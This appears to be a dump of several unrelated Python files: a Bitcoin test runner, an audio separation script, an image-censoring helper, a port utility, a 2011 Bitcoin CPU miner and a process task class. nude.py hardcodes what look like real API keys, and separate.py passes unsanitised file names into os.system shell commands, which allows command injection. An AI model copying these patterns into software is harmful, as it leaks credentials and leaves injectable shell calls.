tests_excl = [re.sub(r"\.py$", "", t)
+ ".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
    # Always use timings from src_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitoutput,
tmpdir, args.jobs, args.testsuitename, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, test_suite_name,
enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime, test_suite_name)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(
", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print(
"\n".join(
deque(
combined_logs.splitlines(),
combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
    Return all available test scripts from the script directory (excluding NON_SCRIPTS).
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
    Returns only tests that will not run longer than the cutoff.
    Long running tests are returned first to favor running tests in parallel.
    Timings from the build directory override those from the src directory.
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the
# list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
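# A small, self-contained sketch (hypothetical test names and timings, not taken from any
# real timing file) of the ordering used by get_tests_to_run(): tests over the cutoff are
# dropped and the remainder runs longest-first so parallel jobs finish sooner.
def _example_test_ordering():
    timings = {'feature_long.py': 300, 'wallet_mid.py': 50, 'rpc_quick.py': 5}
    cutoff = 100
    runnable = [t for t in timings if timings[t] <= cutoff]
    runnable.sort(key=lambda t: (-timings[t], t))
    return runnable  # ['wallet_mid.py', 'rpc_quick.py']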
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
        # This is shared from `test/functional/test_framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time, test_suite_name):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "{}".format(test_suite_name),
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
    Takes care of loading, merging and saving test execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
        Return a new list containing the existing timings updated with the new timings.
        Tests that no longer exist are not removed.
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
        # we only save tests that have passed - timings for failed tests might be
        # wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
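# A minimal, self-contained sketch of the merge performed by Timings.get_merged_timings():
# entries are keyed by name, new timings overwrite matching names, and names that only
# appear in the existing list are kept (the values below are made up).
def _example_merge_timings():
    existing = [{'name': 'a.py', 'time': 10}, {'name': 'b.py', 'time': 20}]
    new = [{'name': 'b.py', 'time': 25}, {'name': 'c.py', 'time': 5}]
    merged = {}
    for item in existing + new:
        merged.setdefault(item['name'], {}).update(item)
    return sorted(merged.values(), key=lambda t: t['name'])
    # [{'name': 'a.py', 'time': 10}, {'name': 'b.py', 'time': 25}, {'name': 'c.py', 'time': 5}]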
if __name__ == '__main__':
main()
|
separate.py
|
import argparse
import os
import pathlib
import time
from typing import NoReturn
import threading
import numpy as np
import soundfile
import torch
from bytesep.models.lightning_modules import get_model_class
from bytesep.separator import Separator
from bytesep.utils import load_audio, read_yaml
def init_abn() -> NoReturn:
# Need to use torch.distributed if models contain inplace_abn.abn.InPlaceABNSync.
import torch.distributed as dist
dist.init_process_group(
'gloo', init_method='file:///tmp/somefile', rank=0, world_size=1
)
def build_separator(config_yaml: str, checkpoint_path: str, device: str) -> Separator:
r"""Build separator.
Args:
config_yaml: str
checkpoint_path: str
device: "cuda" | "cpu"
Returns:
separator: Separator
"""
# Read config file.
configs = read_yaml(config_yaml)
sample_rate = configs['train']['sample_rate']
input_channels = configs['train']['input_channels']
output_channels = configs['train']['output_channels']
target_source_types = configs['train']['target_source_types']
target_sources_num = len(target_source_types)
model_type = configs['train']['model_type']
segment_seconds = 30
segment_samples = int(segment_seconds * sample_rate)
batch_size = 1
print("Using {} for separating ..".format(device))
models_contains_inplaceabn = False
if models_contains_inplaceabn:
        init_abn()
# Get model class.
Model = get_model_class(model_type)
# Create model.
model = Model(
input_channels=input_channels,
output_channels=output_channels,
target_sources_num=target_sources_num,
)
# Load checkpoint.
checkpoint = torch.load(checkpoint_path, map_location='cpu')
model.load_state_dict(checkpoint["model"])
# Move model to device.
model.to(device)
# Create separator.
separator = Separator(
model=model,
segment_samples=segment_samples,
batch_size=batch_size,
device=device,
)
return separator
def match_audio_channels(audio: np.ndarray, input_channels: int) -> np.ndarray:
    r"""Match the input audio to the expected number of channels.
Args:
audio: (audio_channels, audio_segments)
input_channels: int
Returns:
(input_channels, audio_segments)
"""
audio_channels = audio.shape[0]
if audio_channels == input_channels:
return audio
elif audio_channels == 2 and input_channels == 1:
return np.mean(audio, axis=0)[None, :]
elif audio_channels == 1 and input_channels == 2:
return np.tile(audio, (2, 1))
else:
raise NotImplementedError
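# A short, self-contained illustration of match_audio_channels() on dummy data:
# stereo input is averaged down to mono, and mono input is tiled up to stereo.
def _example_match_audio_channels():
    stereo = np.ones((2, 4))                         # (audio_channels=2, audio_samples=4)
    mono = match_audio_channels(stereo, 1)           # shape (1, 4): the per-sample channel mean
    back_to_stereo = match_audio_channels(mono, 2)   # shape (2, 4): the mono signal tiled twice
    return mono.shape, back_to_stereo.shape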
def separate_file(args) -> NoReturn:
r"""Separate a single file.
Args:
config_yaml: str, the config file of a model being trained.
checkpoint_path: str, the path of checkpoint to be loaded.
audio_path: str, path of file to be separated.
output_path: str, path of separated file to be written.
scale_volume: bool
cpu: bool
Returns:
NoReturn
"""
# Arguments & parameters
config_yaml = args.config_yaml
checkpoint_path = args.checkpoint_path
audio_path = args.audio_path
output_path = args.output_path
scale_volume = args.scale_volume
cpu = args.cpu
if cpu or not torch.cuda.is_available():
device = torch.device('cpu')
else:
device = torch.device('cuda')
# Read yaml files.
configs = read_yaml(config_yaml)
sample_rate = configs['train']['sample_rate']
input_channels = configs['train']['input_channels']
# Build Separator.
separator = build_separator(config_yaml, checkpoint_path, device)
# paths
if os.path.dirname(output_path) != "":
os.makedirs(os.path.dirname(output_path), exist_ok=True)
# Load audio.
audio = load_audio(audio_path=audio_path, mono=False, sample_rate=sample_rate)
    # audio: (audio_channels, audio_samples)
audio = match_audio_channels(audio, input_channels)
# audio: (input_channels, audio_samples)
input_dict = {'waveform': audio}
# Separate
separate_time = time.time()
sep_audio = separator.separate(input_dict)
# (input_channels, audio_samples)
print('Separate time: {:.3f} s'.format(time.time() - separate_time))
    # Scale the volume if requested.
if scale_volume:
sep_audio /= np.max(np.abs(sep_audio))
# Write out separated audio.
tmp_wav_path = output_path + ".wav"
soundfile.write(file=tmp_wav_path, data=sep_audio.T, samplerate=sample_rate)
os.system(
'ffmpeg -y -loglevel panic -i "{}" "{}"'.format(tmp_wav_path, output_path)
)
os.system('rm "{}"'.format(tmp_wav_path))
print('Write out to {}'.format(output_path))
def separate_dir(args) -> NoReturn:
r"""Separate all audios in a directory.
Args:
config_yaml: str, the config file of a model being trained.
checkpoint_path: str, the path of checkpoint to be loaded.
audios_dir: str, the directory of audios to be separated.
output_dir: str, the directory to write out separated audios.
scale_volume: bool, if True then the volume is scaled to the maximum value of 1.
cpu: bool
Returns:
NoReturn
"""
# Arguments & parameters
config_yaml = args.config_yaml
checkpoint_path = args.checkpoint_path
audios_dir = args.audios_dir
outputs_dir = args.outputs_dir
scale_volume = args.scale_volume
cpu = args.cpu
if cpu or not torch.cuda.is_available():
device = torch.device('cpu')
else:
device = torch.device('cuda')
# Read yaml files.
configs = read_yaml(config_yaml)
sample_rate = configs['train']['sample_rate']
# Build separator.
separator = build_separator(config_yaml, checkpoint_path, device)
# paths
os.makedirs(outputs_dir, exist_ok=True)
audio_names = sorted(os.listdir(audios_dir))
audios_num = len(audio_names)
for n, audio_name in enumerate(audio_names):
audio_path = os.path.join(audios_dir, audio_name)
# Load audio.
audio = load_audio(audio_path=audio_path, mono=False, sample_rate=sample_rate)
input_dict = {'waveform': audio}
# Separate
separate_time = time.time()
sep_audio = separator.separate(input_dict)
# (input_channels, audio_samples)
print('Separate time: {:.3f} s'.format(time.time() - separate_time))
# Write out separated audio.
if scale_volume:
sep_audio /= np.max(np.abs(sep_audio))
output_path = os.path.join(
outputs_dir, '{}.mp3'.format(pathlib.Path(audio_name).stem)
)
tmp_wav_path = '{}.wav'.format(output_path)
soundfile.write(file=tmp_wav_path, data=sep_audio.T, samplerate=sample_rate)
command_1 = 'ffmpeg -y -loglevel panic -i "{}" "{}" \n rm "{}" \n echo {} / {}, Write out to {}'.format(tmp_wav_path, output_path, tmp_wav_path, n, audios_num, output_path)
t1 = threading.Thread(target=os.system, args=(command_1,))
t1.start()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest="mode")
parser_separate = subparsers.add_parser("separate_file")
parser_separate.add_argument(
"--config_yaml",
type=str,
required=True,
help="The config file of a model being trained.",
)
parser_separate.add_argument(
"--checkpoint_path", type=str, required=True, help="Checkpoint path."
)
parser_separate.add_argument(
"--audio_path",
type=str,
required=True,
help="The path of audio to be separated.",
)
parser_separate.add_argument(
"--output_path",
type=str,
required=True,
help="The path to write out separated audio.",
)
parser_separate.add_argument(
'--scale_volume',
action='store_true',
default=False,
help="Set this flag to scale separated audios to maximum value of 1.",
)
parser_separate.add_argument(
'--cpu',
action='store_true',
default=False,
help="Set this flag to use CPU.",
)
parser_separate_dir = subparsers.add_parser("separate_dir")
parser_separate_dir.add_argument(
"--config_yaml",
type=str,
required=True,
help="The config file of a model being trained.",
)
parser_separate_dir.add_argument(
"--checkpoint_path", type=str, required=True, help="Checkpoint path."
)
parser_separate_dir.add_argument(
"--audios_dir",
type=str,
required=True,
help="The directory of audios to be separated.",
)
parser_separate_dir.add_argument(
"--outputs_dir",
type=str,
required=True,
help="The directory to write out separated audios.",
)
parser_separate_dir.add_argument(
'--scale_volume',
action='store_true',
default=False,
help="Set this flag to scale separated audios to maximum value of 1.",
)
parser_separate_dir.add_argument(
'--cpu',
action='store_true',
default=False,
help="Set this flag to use CPU.",
)
args = parser.parse_args()
if args.mode == "separate_file":
separate_file(args)
elif args.mode == "separate_dir":
separate_dir(args)
else:
raise NotImplementedError
|
nude.py
|
from aip import AipImageCensor
from queue import Queue
import os
from threading import Thread
""" 你的 APPID AK SK """
APP_ID = '16417834'
API_KEY = 'Mrr6fjs7vg95aslKyMKpfa2k'
SECRET_KEY = 'EsMycqjPXC4mnauARQyGlESFSgxfOexa'
client = AipImageCensor(APP_ID, API_KEY, SECRET_KEY)
def check_file_content(file_path, q):
    """ Read the image and call the image censoring (porn detection) API """
    with open(file_path, 'rb') as fp:
        content = fp.read()
    result = client.imageCensorUserDefined(content)
    # '不合规' means the image was judged non-compliant
    if result['conclusion'] == '不合规':
        q.put(False)
    else:
        q.put(True)
def check_image(file_path):
q = Queue()
t = Thread(target=check_file_content, args=[file_path, q])
t.start()
return q.get()
|
network.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import errno
import socket
import SocketServer
import multiprocessing
import SimpleHTTPServer
import atexit
import logging
socketProcesses = []
assignedPorts = set()
@atexit.register
def cleanupSocketProcesses():
logging.debug("Killing socket processes.")
    for process in socketProcesses:
        process.terminate()
        process.join()
def getUnboundPort(host="", minRange=30000, maxRange=35000, socket_type=1, assignOnlyOnce=False):
for port in range(minRange, maxRange):
if port in assignedPorts:
continue
sd = socket.socket(type=socket_type)
try:
sd.bind((host, port))
except socket.error as err:
            if err.errno != errno.EADDRINUSE:
print(err.strerror)
sd = None
else:
sd.close()
if assignOnlyOnce:
assignedPorts.add(port)
return port
return -1
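# A brief usage sketch for getUnboundPort() with a hypothetical port range: reserve a
# free TCP port once so repeated calls do not hand out the same port again.
def exampleReservePort():
    port = getUnboundPort(minRange=31000, maxRange=31010, assignOnlyOnce=True)
    if port == -1:
        logging.debug("No free port found in the requested range.")
    return port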
def runHTTPDThread():
port = getUnboundPort(minRange=8000, maxRange=9000)
httpd = SocketServer.TCPServer(("", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
p = multiprocessing.Process(target=httpd.serve_forever, args=())
p.start()
socketProcesses.append(p)
return port
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
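# A tiny self-checking sketch of the helpers above: bytereverse() swaps the byte order
# of a 32-bit word, e.g. 0x12345678 -> 0x78563412.
def example_bytereverse():
    return bytereverse(0x12345678) == 0x78563412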
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 57016
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
process_task.py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: process_task for a task(ProcessMode)
Created: 2016/12/12
"""
import unittest
import time
import multiprocessing
import threading
from multiprocessing import Pipe
from pprint import pprint
import exceptions
def sleep_(num):
#pprint("~~~")
time.sleep(num)
#----------------------------------------------------------------------
def testfun(num):
""""""
#print('UserFunc called!')
for i in range(6):
threading.Thread(target=sleep_, args=(num,)).start()
#print('SubProcess Called!')
time.sleep(0.4)
#pprint(threading.enumerate())
########################################################################
class ProcessTask(multiprocessing.Process):
""""""
#----------------------------------------------------------------------
def __init__(self, id, target, args=tuple(), kwargs={}, status_monitor_pipe=None,
threads_update_interval=0.0):
"""Constructor"""
multiprocessing.Process.__init__(self, name=id)
self._target = target
self.args = args
self.kwargs = kwargs
self._id = id
self._sub_threads_list = []
self._threads_update_interval = threads_update_interval
self._status_monitor_pipe = status_monitor_pipe
#self._init_timer()
#----------------------------------------------------------------------
def _init_timer(self):
""""""
self._threads_monitor = threading.Thread(name='update_subthreads_list',
target=self._deamon_check_threads)
self._threads_monitor.daemon = True
self._threads_monitor.start()
#----------------------------------------------------------------------
@property
def task_id(self):
""""""
return self._id
#----------------------------------------------------------------------
def run(self):
""""""
self._init_timer()
try:
self._target(*self.args, **self.kwargs)
except exceptions.TaskRuntimeError:
            raise NotImplementedError
#----------------------------------------------------------------------
def _enum_threads(self):
""""""
threads_list = threading.enumerate()
return threads_list
